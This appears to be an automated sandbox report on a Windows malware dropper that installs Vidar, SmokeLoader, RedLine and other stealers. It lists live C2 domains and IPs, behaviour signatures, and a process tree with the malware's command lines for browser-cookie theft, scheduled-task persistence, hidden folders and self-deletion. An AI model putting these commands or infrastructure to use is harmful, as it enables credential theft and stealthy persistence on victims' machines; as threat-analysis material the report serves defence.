Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    128s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-07-2021 23:45

General

  • Target

    8 (12).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1k_TEST

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

redline

C2

45.140.147.111:22333

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 40 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 9 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 10 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1356
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2700
      • C:\Users\Admin\AppData\Local\Temp\8 (12).exe
        "C:\Users\Admin\AppData\Local\Temp\8 (12).exe"
        1⤵
          PID:3760
          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2856
            • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\setup_install.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS82B01114\setup_install.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2020
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_7.exe
                4⤵
                  PID:3700
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 432
                  4⤵
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1116
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3624
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2044
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2140
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1860
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1264
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:788
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2788
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2712
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                1⤵
                • Suspicious use of SetThreadContext
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1076
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                    PID:4484
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                    2⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    PID:4640
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2424
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                    1⤵
                      PID:2372
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                      1⤵
                        PID:1864
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                        1⤵
                          PID:1452
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                          1⤵
                            PID:1212
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1152
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                              1⤵
                              • Drops file in System32 directory
                              PID:1060
                              • C:\ProgramData\Provisioning\settings.exe
                                C:\ProgramData\Provisioning\settings.exe
                                2⤵
                                  PID:4384
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                    3⤵
                                    • Creates scheduled task(s)
                                    PID:5876
                                • C:\Users\Admin\AppData\Roaming\bibcdhr
                                  C:\Users\Admin\AppData\Roaming\bibcdhr
                                  2⤵
                                    PID:1392
                                  • C:\Users\Admin\AppData\Roaming\uvbcdhr
                                    C:\Users\Admin\AppData\Roaming\uvbcdhr
                                    2⤵
                                      PID:1284
                                    • C:\Users\Admin\AppData\Roaming\hvbcdhr
                                      C:\Users\Admin\AppData\Roaming\hvbcdhr
                                      2⤵
                                        PID:5188
                                        • C:\Users\Admin\AppData\Roaming\hvbcdhr
                                          C:\Users\Admin\AppData\Roaming\hvbcdhr
                                          3⤵
                                          • Executes dropped EXE
                                          PID:5052
                                      • C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe
                                        C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe --Task
                                        2⤵
                                          PID:5568
                                          • C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe
                                            C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe --Task
                                            3⤵
                                              PID:5872
                                          • C:\ProgramData\Provisioning\settings.exe
                                            C:\ProgramData\Provisioning\settings.exe
                                            2⤵
                                              PID:2300
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                3⤵
                                                • Creates scheduled task(s)
                                                PID:4840
                                            • C:\Users\Admin\AppData\Roaming\bibcdhr
                                              C:\Users\Admin\AppData\Roaming\bibcdhr
                                              2⤵
                                                PID:2316
                                              • C:\Users\Admin\AppData\Roaming\uvbcdhr
                                                C:\Users\Admin\AppData\Roaming\uvbcdhr
                                                2⤵
                                                  PID:4828
                                                • C:\Users\Admin\AppData\Roaming\hvbcdhr
                                                  C:\Users\Admin\AppData\Roaming\hvbcdhr
                                                  2⤵
                                                    PID:5692
                                                    • C:\Users\Admin\AppData\Roaming\hvbcdhr
                                                      C:\Users\Admin\AppData\Roaming\hvbcdhr
                                                      3⤵
                                                        PID:2672
                                                    • C:\ProgramData\Provisioning\settings.exe
                                                      C:\ProgramData\Provisioning\settings.exe
                                                      2⤵
                                                        PID:1340
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:5996
                                                      • C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe
                                                        C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe --Task
                                                        2⤵
                                                          PID:6080
                                                          • C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe
                                                            C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe --Task
                                                            3⤵
                                                              PID:1516
                                                          • C:\ProgramData\Provisioning\settings.exe
                                                            C:\ProgramData\Provisioning\settings.exe
                                                            2⤵
                                                              PID:5628
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:3308
                                                            • C:\Users\Admin\AppData\Roaming\bibcdhr
                                                              C:\Users\Admin\AppData\Roaming\bibcdhr
                                                              2⤵
                                                                PID:4044
                                                              • C:\Users\Admin\AppData\Roaming\uvbcdhr
                                                                C:\Users\Admin\AppData\Roaming\uvbcdhr
                                                                2⤵
                                                                  PID:4284
                                                                • C:\Users\Admin\AppData\Roaming\hvbcdhr
                                                                  C:\Users\Admin\AppData\Roaming\hvbcdhr
                                                                  2⤵
                                                                    PID:5768
                                                                  • C:\ProgramData\Provisioning\settings.exe
                                                                    C:\ProgramData\Provisioning\settings.exe
                                                                    2⤵
                                                                      PID:2796
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                        3⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:4384
                                                                    • C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe
                                                                      C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3\7972.exe --Task
                                                                      2⤵
                                                                        PID:3484
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                      1⤵
                                                                        PID:364
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_3.exe
                                                                        sonia_3.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies system certificate store
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:3760
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 1808
                                                                          2⤵
                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                          • Program crash
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5060
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_1.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_1.exe" -a
                                                                        1⤵
                                                                          PID:4140
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_5.exe
                                                                          sonia_5.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Checks computer location settings
                                                                          PID:2184
                                                                          • C:\Users\Admin\Documents\mPqoXwttiRQujt2KxZzBsk_Y.exe
                                                                            "C:\Users\Admin\Documents\mPqoXwttiRQujt2KxZzBsk_Y.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:4568
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              3⤵
                                                                                PID:5928
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                3⤵
                                                                                  PID:6000
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  3⤵
                                                                                    PID:4392
                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                    3⤵
                                                                                      PID:4224
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                        PID:5656
                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                        3⤵
                                                                                          PID:5812
                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                            PID:4224
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                            3⤵
                                                                                              PID:1192
                                                                                          • C:\Users\Admin\Documents\HrEDFDYmXs3CL6RL8Ic8J0Gz.exe
                                                                                            "C:\Users\Admin\Documents\HrEDFDYmXs3CL6RL8Ic8J0Gz.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4508
                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                              schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:4392
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                4⤵
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies registry class
                                                                                                PID:4484
                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                              cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                              3⤵
                                                                                                PID:2848
                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                  attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                                  4⤵
                                                                                                  • Views/modifies file attributes
                                                                                                  PID:4488
                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                  attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                  4⤵
                                                                                                  • Views/modifies file attributes
                                                                                                  PID:2692
                                                                                              • C:\ProgramData\Provisioning\settings.exe
                                                                                                "C:\ProgramData\Provisioning\settings.exe"
                                                                                                3⤵
                                                                                                  PID:4948
                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                    schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                    4⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:5528
                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                    cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                    4⤵
                                                                                                      PID:6004
                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                        attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                                        5⤵
                                                                                                        • Views/modifies file attributes
                                                                                                        PID:4452
                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                        attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                        5⤵
                                                                                                        • Views/modifies file attributes
                                                                                                        PID:5152
                                                                                                • C:\Users\Admin\Documents\eGhvy9F8cTYMtOdQ8YLuAiTf.exe
                                                                                                  "C:\Users\Admin\Documents\eGhvy9F8cTYMtOdQ8YLuAiTf.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4472
                                                                                                  • C:\Users\Admin\Documents\eGhvy9F8cTYMtOdQ8YLuAiTf.exe
                                                                                                    "C:\Users\Admin\Documents\eGhvy9F8cTYMtOdQ8YLuAiTf.exe"
                                                                                                    3⤵
                                                                                                      PID:6052
                                                                                                  • C:\Users\Admin\Documents\WeoncT7VTjGYiIofkbnLdfqF.exe
                                                                                                    "C:\Users\Admin\Documents\WeoncT7VTjGYiIofkbnLdfqF.exe"
                                                                                                    2⤵
                                                                                                      PID:4380
                                                                                                      • C:\Users\Admin\Documents\WeoncT7VTjGYiIofkbnLdfqF.exe
                                                                                                        C:\Users\Admin\Documents\WeoncT7VTjGYiIofkbnLdfqF.exe
                                                                                                        3⤵
                                                                                                          PID:5452
                                                                                                        • C:\Users\Admin\Documents\WeoncT7VTjGYiIofkbnLdfqF.exe
                                                                                                          C:\Users\Admin\Documents\WeoncT7VTjGYiIofkbnLdfqF.exe
                                                                                                          3⤵
                                                                                                            PID:5460
                                                                                                        • C:\Users\Admin\Documents\9HxZrOPmn6sogxXgTbWqe2TE.exe
                                                                                                          "C:\Users\Admin\Documents\9HxZrOPmn6sogxXgTbWqe2TE.exe"
                                                                                                          2⤵
                                                                                                            PID:4244
                                                                                                            • C:\Users\Admin\Documents\9HxZrOPmn6sogxXgTbWqe2TE.exe
                                                                                                              C:\Users\Admin\Documents\9HxZrOPmn6sogxXgTbWqe2TE.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:1896
                                                                                                          • C:\Users\Admin\Documents\qGlAuVtuW4MjV6f7j95G8_TA.exe
                                                                                                            "C:\Users\Admin\Documents\qGlAuVtuW4MjV6f7j95G8_TA.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4232
                                                                                                          • C:\Users\Admin\Documents\hyBT7glsrIxJ4oa8ImqUzPaA.exe
                                                                                                            "C:\Users\Admin\Documents\hyBT7glsrIxJ4oa8ImqUzPaA.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4888
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                              3⤵
                                                                                                                PID:1176
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                  4⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:5848
                                                                                                            • C:\Users\Admin\Documents\3MpHRxjdsW5ETNpEE2WLa1gC.exe
                                                                                                              "C:\Users\Admin\Documents\3MpHRxjdsW5ETNpEE2WLa1gC.exe"
                                                                                                              2⤵
                                                                                                                PID:4852
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5360198506.exe"
                                                                                                                  3⤵
                                                                                                                    PID:5372
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5360198506.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\5360198506.exe"
                                                                                                                      4⤵
                                                                                                                        PID:5744
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 5360198506.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5360198506.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                          5⤵
                                                                                                                            PID:1172
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /im 5360198506.exe /f
                                                                                                                              6⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:5676
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /t 6
                                                                                                                              6⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:5664
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4928310979.exe"
                                                                                                                        3⤵
                                                                                                                          PID:3924
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4928310979.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\4928310979.exe"
                                                                                                                            4⤵
                                                                                                                              PID:3416
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "3MpHRxjdsW5ETNpEE2WLa1gC.exe" /f & erase "C:\Users\Admin\Documents\3MpHRxjdsW5ETNpEE2WLa1gC.exe" & exit
                                                                                                                            3⤵
                                                                                                                              PID:4108
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im "3MpHRxjdsW5ETNpEE2WLa1gC.exe" /f
                                                                                                                                4⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5604
                                                                                                                          • C:\Users\Admin\Documents\RiG3WGpUwe302npfSYsrpD24.exe
                                                                                                                            "C:\Users\Admin\Documents\RiG3WGpUwe302npfSYsrpD24.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4768
                                                                                                                          • C:\Users\Admin\Documents\QE3KikNZtXDHepMzM8E7HkCO.exe
                                                                                                                            "C:\Users\Admin\Documents\QE3KikNZtXDHepMzM8E7HkCO.exe"
                                                                                                                            2⤵
                                                                                                                              PID:4332
                                                                                                                              • C:\Users\Admin\Documents\QE3KikNZtXDHepMzM8E7HkCO.exe
                                                                                                                                C:\Users\Admin\Documents\QE3KikNZtXDHepMzM8E7HkCO.exe
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4192
                                                                                                                            • C:\Users\Admin\Documents\Vw86ZNU3HvbUJcPsbfOAhmkD.exe
                                                                                                                              "C:\Users\Admin\Documents\Vw86ZNU3HvbUJcPsbfOAhmkD.exe"
                                                                                                                              2⤵
                                                                                                                                PID:4716
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\Vw86ZNU3HvbUJcPsbfOAhmkD.exe"
                                                                                                                                  3⤵
                                                                                                                                    PID:4140
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout /T 10 /NOBREAK
                                                                                                                                      4⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:4220
                                                                                                                                • C:\Users\Admin\Documents\y8Mvo2tTFTPvX4No6qENKdQa.exe
                                                                                                                                  "C:\Users\Admin\Documents\y8Mvo2tTFTPvX4No6qENKdQa.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  PID:4596
                                                                                                                                  • C:\Users\Public\run.exe
                                                                                                                                    C:\Users\Public\run.exe
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
